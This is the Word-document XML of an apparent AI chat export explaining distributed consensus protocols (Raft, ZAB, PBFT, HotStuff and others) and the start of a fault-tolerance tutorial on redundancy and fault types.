              <w:t>2f+1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D662C3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>O(n) steady-state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97B1A0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>High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861859" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Spanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="3546EB9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223861" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Raft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D9D11A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Crash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37D9FE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>2f+1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B2AF62" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>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FEE85E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Moderate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25269C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>etcd, CockroachDB, TiDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="39E2683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C8CD2E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>ZAB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7448EF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Crash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1ECFF8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>2f+1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1D1A16" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>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7E924A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Moderate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BEE19F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>ZooKeeper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="0D72D48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C46BC2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Viewstamped Replication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66B54A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Crash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459A20" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>2f+1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36609E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>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256092" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Moderate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F68C59" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Research</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="6B0C6FA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4F05C0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>PBFT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9C4E29" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Byzantine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6F4DF5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>3f+1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0E5DB7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>O(n²)</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2DE151" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Very high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29B4DD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Blockchain (permissioned)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="71C32BD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25478B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Tendermint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367789" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Byzantine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94AD04" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>3f+1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BE6206" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>O(n²)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C3456A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>High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4AC70E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Cosmos blockchain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="7934DD4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76BDEF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>HotStuff</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617561" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Byzantine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E0F83C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>3f+1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9FE226" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>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B3A92B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Moderate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6D968A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Libra/Diem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C1A1959" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="786F85DA">
          <v:rect id="_x0000_i6252" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B77D3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Summary — The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A40A34F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC5D661" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>┌──────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE286C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│                     CONSENSUS IN SYSTEM DESIGN                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16218144" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E68D2DD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│  What it solves:                                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E34DD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Multiple nodes agreeing on a value/sequence despite failures.  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEECE30" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068E15A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│  Core guarantee:                                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A1256" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Safety: nodes NEVER disagree.                                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE4283" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Liveness: nodes EVENTUALLY agree (in favorable conditions).    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A6A31" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398A208" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│  The two families:                                                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218CEAA5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Crash tolerance (Paxos, Raft): 2f+1 nodes for f failures      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36127856" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Byzantine tolerance (PBFT): 3f+1 nodes for f failures         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F3E26" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61203FDF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│  Practical impact:                                                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F48D2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Every write requires a majority to acknowledge → added latency │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD96EF6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    But: system never loses committed data, never has split-brain  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382C8EF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│                                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B632C26" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│  Use consensus for:          Don't use consensus for:             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A197E7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Leader election             High-throughput user data           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D5A8C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Cluster membership          Eventually consistent systems      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297A0B2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Distributed locks           Read-heavy workloads               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFCC5F8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Replicated state machines   Single-region simple replication   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543BE39" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│    Configuration store                                             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E53F63" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>└──────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBD9907" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A44FC5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Consensus is the price you pay for AGREEMENT in the face of failure. It adds latency (one network round trip minimum) and limits throughput (all writes through one leader) and availability (majority must be reachable). But in return, it provides the strongest possible guarantee: committed data is NEVER lost, and all nodes ALWAYS agree on the system's state. The art of system design is using consensus surgically — for the small amount of critical coordination data (leader identity, cluster configuration, transaction commit decisions) — while using cheaper mechanisms (async replication, eventual consistency) for the bulk of application data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAA1B2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRDefault="0049626E" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D169E3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D81823" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copilot said: # Fault Tolerance in System Design —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3422B50E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault Tolerance in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288B8B9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Fault Tolerance Really Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223547E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault tolerance is the ability of a system to continue operating correctly (possibly at a reduced capacity) when one or more of its components fail. It's not about preventing failures — failures are inevitable — it's about designing systems that survive them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D43F5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental insight:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4F434" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A965CD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Reliability of one server: ~99.9% (8.7 hours downtime/year)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB34D6E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Reliability needed for a service: 99.99% (52 minutes downtime/year)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE3446" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="5E184DED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Paradox: How do you build a 99.99% reliable system from 99.9% reliable components?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65725789" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Answer: REDUNDANCY + FAULT DETECTION + AUTOMATED RECOVERY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9505D2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="660D4E6F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>With 3 redundant servers (any 1 can serve):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2786EFFD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  P(all 3 fail simultaneously) = (0.001)³ = 0.000000001 = 99.9999999%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB17374" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  (In practice, correlated failures reduce this, but the principle holds.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A73255" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key terminology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142D732" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C467DCB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault:    The root cause (disk firmware bug, cosmic ray bit flip, network cable cut)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7754AC69" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Error:    The manifestation within the system (corrupted data, incorrect computation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066725EB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Failure:  The externally visible consequence (user gets wrong response, service unavailable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E265FE5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="61399E85" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault → Error → Failure (cascade)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A833558" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="16A279CA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Fault tolerance breaks this chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722707EE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Fault occurs → Error is DETECTED → System RECOVERS → No failure visible to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E683596" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types of faults:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1893"/>
        <w:gridCol w:w="3304"/>
        <w:gridCol w:w="2149"/>
        <w:gridCol w:w="2004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="33A5E73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DCACB5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Fault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DA8733" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Examples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819B80" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Detection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374D87" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00476518">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Frequency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="720F355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A42B81" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Hardware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25DDBC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Disk failure, RAM bit flip, NIC failure, power supply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B86875" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
